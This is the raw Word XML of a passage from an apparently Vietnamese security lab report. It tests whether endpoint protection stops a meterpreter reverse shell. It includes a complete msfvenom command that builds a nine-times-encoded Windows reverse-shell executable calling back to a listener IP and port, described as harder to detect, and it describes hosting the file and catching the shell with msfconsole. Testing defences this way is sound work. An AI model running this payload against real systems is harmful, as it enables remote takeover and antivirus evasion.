    <w:p w14:paraId="54E0F65F" w14:textId="62A351FF" w:rsidR="008641DD" w:rsidRPr="00AC1637" w:rsidRDefault="008641DD" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1637">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Chi tiết thử nghiệm như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171F8C58" w14:textId="77777777" w:rsidR="002C4B7A" w:rsidRPr="00AC1637" w:rsidRDefault="007367BD" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1637">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Thực hiện tạo pay</w:t>
      </w:r>
      <w:r w:rsidR="00E21C00" w:rsidRPr="00AC1637">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>load trên máy Attacker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BD813E" w14:textId="4DAF9A1B" w:rsidR="002C4B7A" w:rsidRPr="00F97D30" w:rsidRDefault="002C4B7A"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 xml:space="preserve">Tạo payload bằng tool msfvenom như sau: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41811025" w14:textId="77777777" w:rsidR="00E25461" w:rsidRPr="00AC1637" w:rsidRDefault="002C4B7A" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1637">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.81.23.100 LPORT=4444 -f exe -e x64/zutto_dekiru -i 9 -o shell_reverse_embedded.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4519BE96" w14:textId="1D94EB07" w:rsidR="00AD4A11" w:rsidRPr="00AC1637" w:rsidRDefault="00E25461" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E25461">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="320D086F" wp14:editId="303B56F4">
            <wp:extent cx="5676900" cy="1842770"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="24130"/>
            <wp:docPr id="1819485246" name="Picture 181948524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5246" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, Phông chữ&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5676900" cy="1842770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABEAC62" w14:textId="6D3493FF" w:rsidR="00186D5B" w:rsidRPr="00F97D30" w:rsidRDefault="00C66A0F"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Paylo</w:t>
      </w:r>
      <w:r w:rsidR="00B01F6F" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ad </w:t>
      </w:r>
      <w:r w:rsidR="00A74E62" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nhằm tạo ra 1 reverse shell</w:t>
      </w:r>
      <w:r w:rsidR="00C44160" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> bằng file thực thi exe</w:t>
      </w:r>
      <w:r w:rsidR="00186D5B" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> với tên là </w:t>
      </w:r>
      <w:r w:rsidR="00A74E62" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00186D5B" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">shell_reverse_embedded.exe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345B5A3E" w14:textId="0DCC058E" w:rsidR="00C66A0F" w:rsidRPr="00F97D30" w:rsidRDefault="00186D5B"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Payload</w:t>
      </w:r>
      <w:r w:rsidR="00F7791D" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> được nhúng </w:t>
      </w:r>
      <w:r w:rsidR="004311F0" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>9 lần endcode bằng bộ encode</w:t>
      </w:r>
      <w:r w:rsidR="00672F13" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> zutto_dekiru để đảm bảo malware khó bị phát hiện hơn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B0A64E" w14:textId="4129E498" w:rsidR="008A0E09" w:rsidRPr="00F97D30" w:rsidRDefault="008A0E09"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Trong payload, LHOST và LPORT chính là IP và Port được mở để lắng nghe kết nối trên máy Attacker</w:t>
      </w:r>
      <w:r w:rsidR="002C398B" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E092B6F" w14:textId="32048DB4" w:rsidR="00E21C00" w:rsidRPr="00AC1637" w:rsidRDefault="0066214B" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1637">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload </w:t>
      </w:r>
      <w:r w:rsidR="00F42388" w:rsidRPr="00AC1637">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>malware lên Web Server đã được build sẵn ở máy Attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B0CEE0" w14:textId="2E59E8D7" w:rsidR="00F42388" w:rsidRPr="00AC1637" w:rsidRDefault="008963BC" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008963BC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A464A5C" wp14:editId="3D7E9DBA">
            <wp:extent cx="5699760" cy="1432560"/>
            <wp:effectExtent l="19050" t="19050" r="15240" b="15240"/>
            <wp:docPr id="1088991425" name="Picture 1088991425"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1425" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, phần mềm, Phần mềm đa phương tiện, Phông chữ&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5700254" cy="1432684"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36740624" w14:textId="667C9DD7" w:rsidR="00F42388" w:rsidRPr="00AC1637" w:rsidRDefault="009F746D" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1637">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Thực hiện exploit và đợi kết nối từ máy Victim (Endpoint)</w:t>
      </w:r>
      <w:r w:rsidR="00CF2E17" w:rsidRPr="00AC1637">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2926E4F8" w14:textId="5E9EEB41" w:rsidR="00CF2E17" w:rsidRPr="00F97D30" w:rsidRDefault="00FD2D5B"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Sử dụng tool msfconsole để thực hiện tấn công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54612D71" w14:textId="19585E5D" w:rsidR="00FD2D5B" w:rsidRPr="00AC1637" w:rsidRDefault="008344F1" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008344F1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E28CD28" wp14:editId="4E9822DF">
            <wp:extent cx="4823878" cy="2903472"/>
            <wp:effectExtent l="19050" t="19050" r="15240" b="11430"/>
            <wp:docPr id="28308377" name="Picture 2830837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377" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, Phông chữ&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4823878" cy="2903472"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AEAE4E" w14:textId="06B7655F" w:rsidR="000A45ED" w:rsidRPr="00F97D30" w:rsidRDefault="0088783F"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Set LHOST và LPORT là địa chỉ IP và PORT của Attacker để tiến hành lắng nghe</w:t>
      </w:r>
      <w:r w:rsidR="00772DF0" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, sau đó exploit, lúc này máy Attacker đang thực hiện lắng nghe kết nối trên port 4444</w:t>
      </w:r>
      <w:r w:rsidR="008641DD" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD88DE8" w14:textId="45C42132" w:rsidR="00CF2E17" w:rsidRPr="00AC1637" w:rsidRDefault="000C0DC9" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1637">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Máy Endpoint download và thực thi</w:t>
      </w:r>
      <w:r w:rsidR="0001194F" w:rsidRPr="00AC1637">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C926EB" w:rsidRPr="00AC1637">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>malware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660792AF" w14:textId="02D58E32" w:rsidR="00DE6035" w:rsidRPr="00AC1637" w:rsidRDefault="00572D4C" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00572D4C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60B4FB8B" wp14:editId="760A1E7A">
            <wp:extent cx="3714750" cy="1583695"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="16510"/>
            <wp:docPr id="2084356564" name="Picture 2084356564"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6564" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, phần mềm, Phông chữ&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3722226" cy="1586882"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="583FBC13" w14:textId="4AA64F61" w:rsidR="009C1CAE" w:rsidRPr="00AC1637" w:rsidRDefault="002E633F" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E633F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30533F94" wp14:editId="52F953C1">
            <wp:extent cx="3697817" cy="2140843"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="12065"/>
            <wp:docPr id="2008928642" name="Picture 2008928642"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8642" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, đồ điện tử, ảnh chụp màn hình, phần mềm&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3705950" cy="2145552"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA1D918" w14:textId="350F4CEF" w:rsidR="00C926EB" w:rsidRPr="00AC1637" w:rsidRDefault="00DD725C" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1637">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kết quả tấn công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418DC246" w14:textId="170367BD" w:rsidR="00DD725C" w:rsidRPr="00F97D30" w:rsidRDefault="00DD725C"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Lúc này máy Attacker đã tấn công reverse shell thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38ECD96B" w14:textId="1AA5D000" w:rsidR="00DD725C" w:rsidRPr="00AC1637" w:rsidRDefault="00DD725C" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD725C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66294B57" wp14:editId="0B0D6769">
            <wp:extent cx="4526672" cy="1143099"/>
            <wp:effectExtent l="19050" t="19050" r="26670" b="19050"/>
            <wp:docPr id="1864708418" name="Picture 186470841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8418" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, Phông chữ&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4526672" cy="1143099"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A549A47" w14:textId="1D1AD4AC" w:rsidR="00DD725C" w:rsidRPr="00F97D30" w:rsidRDefault="004656C1"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 xml:space="preserve">Trên Server, bật lại các tính năng bảo mật </w:t>
      </w:r>
      <w:r w:rsidR="00594C31" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>như</w:t>
      </w:r>
      <w:r w:rsidR="00962EFA" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ở thử</w:t>
      </w:r>
      <w:r w:rsidR="0077162D" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> nghiệm </w:t>
      </w:r>
      <w:r w:rsidR="00AC0DB9" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00F5644B" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69184AEA" w14:textId="71E3E593" w:rsidR="008C021D" w:rsidRPr="00AC1637" w:rsidRDefault="00A3494B" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1637">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Trên máy Endpoint, lúc này đã ngăn chặn cuộc tấn công thành công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F967CDE" w14:textId="0504397B" w:rsidR="00774B51" w:rsidRPr="008D31C5" w:rsidRDefault="00774B51" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="419E2204" wp14:editId="07BAE3B8">
            <wp:extent cx="5539742" cy="3425825"/>
            <wp:effectExtent l="19050" t="19050" r="22860" b="22225"/>
            <wp:docPr id="1373779955" name="Picture 1373779955" descr="Ảnh có chứa văn bản, Website,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779955"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5539742" cy="3425825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B339979" w14:textId="38EA29E8" w:rsidR="00774B51" w:rsidRPr="00F97D30" w:rsidRDefault="00774B51"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Kiểm tra kết nối trên máy Attacker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1015245D" w14:textId="25591D30" w:rsidR="00774B51" w:rsidRPr="008D31C5" w:rsidRDefault="003500DF" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003500DF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66C18B6F" wp14:editId="36CA5F4E">
            <wp:extent cx="3916680" cy="1600200"/>
            <wp:effectExtent l="19050" t="19050" r="26670" b="19050"/>
            <wp:docPr id="1500326612" name="Picture 1500326612"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6612" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, Phông chữ, ảnh chụp màn hình&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3917026" cy="1600341"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3193DC4C" w14:textId="3F1F59C5" w:rsidR="00A3494B" w:rsidRPr="00F97D30" w:rsidRDefault="001564BA" w:rsidP="00F97D30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
